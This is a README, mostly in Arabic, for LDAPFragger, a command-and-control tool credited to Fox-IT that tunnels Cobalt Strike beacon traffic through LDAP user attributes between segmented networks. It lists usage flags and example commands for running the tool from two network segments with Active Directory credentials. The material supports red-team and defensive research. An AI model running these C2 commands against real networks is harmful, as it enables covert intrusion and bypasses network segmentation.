
أداة C2 تقوم بتوجيه بيانات Cobalt Strike beacon عبر سمات مستخدم LDAP للقيادة والتحكم الخفية في الشبكات المجزأة.
LDAPFragger هي أداة تحكم وأوامر (C2) تمكن المهاجمين من توجيه بيانات Cobalt Strike beacon عبر LDAP باستخدام سمات المستخدم.
للحصول على معلومات أساسية، اقرأ المدونة: http://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes
.NET 4.0، لكن قد يعمل مع إصدارات أقدم وأحدث من .NET كذلك _ _ __
| | | | / _|
| | __| | __ _ _ __ | |_ _ __ __ _ __ _ __ _ ___ _ __
| |/ _` |/ _` | '_ \| _| '__/ _` |/ _` |/ _` |/ _ \ '__|
| | (_| | (_| | |_) | | | | | (_| | (_| | (_| | __/ |
|_|\__,_|\__,_| .__/|_| |_| \__,_|\__, |\__, |\___|_|
| | __/ | __/ |
|_| |___/ |___/
Fox-IT - Rindert Kramer
Usage:
--cshost: IP address or hostname of the Cobalt Strike instance
--csport: Port of the external C2 interface on the Cobalt Strike server
-u: Username to connect to Active Directory
-p: Password to connect to Active Directory
-d: FQDN of the Active Directory domain
--ldaps: Use LDAPS instead of LDAP
-v: Verbose output
-h: Display this message
If no AD credentials are provided, integrated AD authentication will be used.
إذا لم يتم تقديم بيانات اعتماد AD، فسيتم استخدام مصادقة AD المدمجة.
مثال على الاستخدام:

من قطاع الشبكة A، قم بتشغيل
LDAPFragger --cshost <Cobalt Strike IP> --csport <External listener port>
LDAPFragger --cshost <Cobalt Strike IP> --csport <External listener port> -u <username> -p <password> -d <domain FQDN>
من قطاع الشبكة B، قم بتشغيل
LDAPFragger
LDAPFragger -u <username> -p <password> -d <domain FQDN>
يمكن استخدام LDAPS مع العلامة --LDAPS، على الرغم من أن حركة LDAP العادية مشفرة أيضًا. يرجى ملاحظة أن حمولة Cobalt Strike الافتراضية سيتم اكتشافها بواسطة معظم برامج مكافحة الفيروسات.